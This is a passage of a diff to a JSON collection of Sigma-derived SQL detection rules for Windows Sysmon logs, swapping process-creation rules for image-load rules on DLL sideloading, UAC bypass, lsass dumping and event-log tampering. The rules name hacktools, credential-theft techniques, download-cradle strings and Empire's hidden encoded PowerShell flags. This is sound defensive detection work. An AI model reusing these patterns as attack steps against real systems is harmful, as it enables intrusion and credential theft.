AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", "status": "test", - "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Network administrator computer" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "Suspicious RASdial Activity", - "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", - "status": "test", - "description": "Detects suspicious process related to rasdial.exe", - "author": "juju4", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "status": "experimental", + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.t1218.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%rasdial.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rasdial_execution.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Add User to Local Administrators Group", - "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", - "status": "experimental", - "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "status": "test", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Administrative activity" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "Suspicious Msiexec Quiet Install", - "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", - "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "author": "frack113", + "title": "WMIC Loading Scripting Libraries", + "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", + "status": "test", + "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.t1220" ], "falsepositives": [ - "Legitimate script" + "The command wmic os get lastboottuptime loads vbscript.dll", + "The command wmic os get locale loads vbscript.dll", + "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_install_quiet.yml" + "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" }, { - "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", - "id": "01c42d3c-242d-4655-85b2-34f1739632f7", + "title": "Potential DLL Sideloading Via JsSchHlp", + "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", "status": "experimental", - "description": "Detects usage of Dsacls to grant over permissive permissions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate administrators granting over permissive permissions to users" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsacls_abuse_permissions.yml" + "filename": "image_load_side_load_jsschhlp.yml" }, { - "title": "Permission Check Via Accesschk.EXE", - "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", "status": "test", - "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", - "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": "48bfd177-7cf2-412b-ad77-baf923489e82", "status": "experimental", - "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.discovery", - "attack.t1087.001" - ], - "falsepositives": [ - "Administrative activity" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" - }, - { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", - "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", + "status": "experimental", + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Other DLLs with the same Imphash" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" ], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": "image_load_hktl_sharpevtmute.yml" }, { - "title": "Perl Inline Command Execution", - "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", + "title": "UIPromptForCredentials DLLs", + "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", "status": "experimental", - "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.collection", + "attack.t1056.002" ], "falsepositives": [ - "Unknown" + "Other legitimate processes loading those DLLs in your environment." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_perl_inline_command_execution.yml" + "filename": "image_load_uipromptforcreds_dlls.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "author": "Vasiliy Burov", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", + "status": "experimental", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in its command line" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "title": "Web Browsers DLL Sideloading", + "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of web browsers", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], "falsepositives": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "filename": "image_load_side_load_web_browsers.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Sideloading Of DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Possible but rare" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rundll32_no_params.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", + "title": "Active Directory Kerberos DLL Loaded Via Office Application", + "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Kerberos DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_office_kerberos_dll_load.yml" }, { - "title": "Gpscript Execution", - "id": "1e59c230-6670-45bf-83b0-98903780607e", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", - "author": "frack113", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate uses of logon scripts distributed via group policy" + "Unknown" ], 